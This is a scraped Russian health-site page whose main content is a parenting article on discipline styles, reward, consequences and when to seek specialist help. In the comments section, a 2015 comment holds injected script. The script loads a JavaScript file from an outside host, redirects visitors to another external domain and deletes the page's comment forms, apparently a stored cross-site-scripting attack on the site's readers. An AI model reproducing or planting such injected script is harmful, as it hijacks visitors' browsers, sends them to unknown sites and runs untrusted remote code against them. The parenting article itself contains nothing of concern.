Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вы, ребенок и дисциплина  >>  Вы, ребенок и дисциплина
 
Обратная связь
 

Вы, ребенок и дисциплина

Размер шрифта
27 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Как правильно воспитывать ребенка, чтобы вырастить из него настоящего человека? Дисциплина предполагает как наказание, так и награду. Но многие родители теряются, сталкиваясь с проблемами воспитания. Как быть?

Три стиля воспитания. Какой из них ваш?

  • Авторитарность. Такой родитель четко знает цель воспитания ребенка. Заботится о ребенке и очень любит его. Способен пойти на уступки, если ребенок ставит его в такое положение и будет решать проблему вместе с ребенком. Эта самая эффективная система воспитания.
  • Деспотичность. Точно так же этот родитель знает цель воспитания. Но при этом не проявляет к ребенку любви. Считает себя правым в любом случае и ожидает, что его решение должны принимать беспрекословно, только потому, что он родитель. Эта форма воспитания – наименее эффективна.
  • Вседозволенность. Такой родитель очень любит ребенка, показывает это, заботится о нем, но не проявляет твердости и не следит за дисциплиной. Эта модель воспитания также неэффективна.

Несколько методов правильного воспитания

Награда за хорошее поведение. Отметить успех ребенка – лучший способ мотивировать его продолжать в том же духе. Хвалите ребенка всякий раз, когда вам хочется, чтобы он впредь вел себя так же.

Не надо «лекций». Объясните ему, что если он, к примеру, сломал игрушку, то завтра играть ему уже будет нечем. Этот аргумент сработает при условии, что ребенку не приходится выслушивать нотации каждый день.

Расскажите о последствиях. Эта техника похожа на предыдущую, но при этом вы объясняете ребенку, что его ждет за плохое поведение: «Если ты не уберешь игрушки, не увидишь их в течение недели» или «Если ты не сделаешь уроки, ты не будешь смотреть телевизор».

Наказания. Ребенок обязательно должен понимать, за что его наказывают. В противном случае непонятное наказание может стать травмой для ребенка. При постоянных побоях ребенок вырастет агрессивным и будет считать, что избиение слабого вполне естественно. Физическое наказание применять нельзя: нефизические методы воздействия на ребенка более эффективны и имеют меньше отрицательных последствий.

Какой у вашего ребенка темперамент? Найдя ответ на этот вопрос, вы поймете, какая техника воспитания нужна, чтобы раскрыть таланты и возможности ребенка. Не пытайтесь переделать ребенка и превратить его из активного в покладистого.

Уважайте ребенка. Даже в момент воспитания проявляйте уважение к ребенку.

Будьте последовательны. Любая техника воспитания терпит крах, если вы не выполняете свои обещания. Не отступайте от своих принципов, даже если находитесь в общественном месте. К примеру, если ребенок закатил истерику в магазине, не стоит идти у него на поводу. Согласуйте с супругом тактику воспитания. На всех взрослых членов семьи она должна быть одна, иначе будет неэффективна.

Что сделано, то сделано. Если ребенок уже понес наказание за провинность, не стоит возвращаться к этой проблеме и добиваться повторных извинений. Займитесь вдвоем чем-нибудь другим.

Постарайтесь понять причины плохого поведения. Задумайтесь о возможных причинах плохого поведения ребенка. Быть может, он переживает из-за того, что родители в ссоре или он подрался с кем-то из друзей? Быть может, он устал или голоден? Все эти причины не оправдывают его плохого поведения. Но если вы поймете, в чем дело, вам будет легче предупредить непослушание в дальнейшем.

Сделайте перерыв. Бывают дни, когда не работают даже самые проверенные приемы. И если вы чувствуете, что допустили ошибку, будьте честны и извинитесь перед ребенком.

Когда и где вам может понадобиться помощь

Если вы чувствуете, что ребенок выходит из-под контроля и становится неуправляемым, обратитесь за помощью к специалисту, особенно, если у вас появились проблемы следующего характера:

  • ребенок демонстрирует неуважение к родителям и учителям;
  • ребенок ведет себя агрессивно;
  • ребенок в депрессии, у него появились мысли о суициде, у него нет друзей;
  • ребенок начал употреблять алкоголь, чтобы выйти из стресса и закрыться от проблем.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Родители стали хуже после падения Берлинской стены!   Ликопид на защите иммунитета против экзаменационных стрессов!   И было у нее три сына: один – умный, второй – глупый, а третий – футболист!   Как воспитывать ребенка: палка или пряник? Ученые докопались до истины  
24 мая 2013Ученые сошли сума! Они доказали, что компьютерные игры стимулируют чтение! 17 мая 2013Пол вашего ребенка влияет на продолжительность жизни! Кого рожать, чтобы прожить дольше?
 
09 мая 2013Как воспитывать ребенка: палка или пряник? Ученые докопались до истины 02 мая 2013Чем мыть ребенка, чтобы не испортить его кожу
 

Слайдшоу

1
Первые шаги вашего малыша
Растяжки! Можно ли от них избавиться?
Что делать с депрессивным супругом

Тесты

Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.